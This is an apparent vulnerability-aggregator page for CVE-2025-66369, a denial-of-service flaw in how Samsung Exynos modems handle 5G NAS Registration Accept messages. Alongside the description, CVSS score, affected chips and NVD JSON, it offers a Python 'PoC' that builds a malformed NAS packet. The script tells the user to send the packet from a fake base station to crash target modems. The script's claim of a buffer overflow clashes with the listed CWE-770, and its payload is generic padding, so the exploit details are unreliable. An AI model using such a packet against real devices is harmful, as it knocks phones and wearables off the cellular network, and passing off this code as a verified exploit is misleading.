Security Vulnerability Report
中文
CVE-2025-66369 CVSS 7.5 HIGH

CVE-2025-66369

Published: 2026-05-05 16:16:10
Last Modified: 2026-05-06 20:16:30
Source: [email protected]

Description

An issue was discovered in MM in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, W920, W930, W1000, Modem 5123, and Modem 5300. Incorrect handling of 5G NR NAS registration accept messages leads to a Denial of Service.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Exynos 980
Exynos 990
Exynos 850
Exynos 2100
Exynos 1280
Exynos 2200
Exynos 1330
Exynos 1380
Exynos 1480
Exynos 2400
Exynos 1580
Exynos W920
Exynos W930
Exynos W1000
Modem 5123
Modem 5300

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2025-66369: Samsung Exynos 5G NR NAS DoS # This script demonstrates the structure of a malformed NAS message. # Actual transmission requires base station hardware (SDR). import struct def build_malformed_nas(): # 5G MM Message Type: Registration Accept (0x42) # Constructing a payload with invalid length fields to trigger the parsing bug # Extended Protocol Discriminator: 5G Mobility Management messages (0x7E) epd = bytes([0x7E]) # Security Header Type: Plain NAS message, not security protected (0x00) sec_header = bytes([0x00]) # Message Type: Registration Accept (0x42) msg_type = bytes([0x42]) # Malformed 5G GUTI or spare bytes # Sending an oversized string or unexpected IE to cause buffer overflow/crash malformed_payload = bytes([0x77]) + b'\x00' * 200 # Assemble the packet nas_packet = epd + sec_header + msg_type + malformed_payload return nas_packet if __name__ == "__main__": poc = build_malformed_nas() print(f"[*] CVE-2025-66369 PoC generated.") print(f"[*] Malformed NAS Packet Length: {len(poc)} bytes") print(f"[*] Hex Dump: {poc.hex()}") print("[*] Send this packet via a fake base station to target the Exynos modem.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66369", "sourceIdentifier": "[email protected]", "published": "2026-05-05T16:16:10.307", "lastModified": "2026-05-06T20:16:29.870", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in MM in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, W920, W930, W1000, Modem 5123, and Modem 5300. Incorrect handling of 5G NR NAS registration accept messages leads to a Denial of Service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/", "source": "[email protected]"}, {"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-66369/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.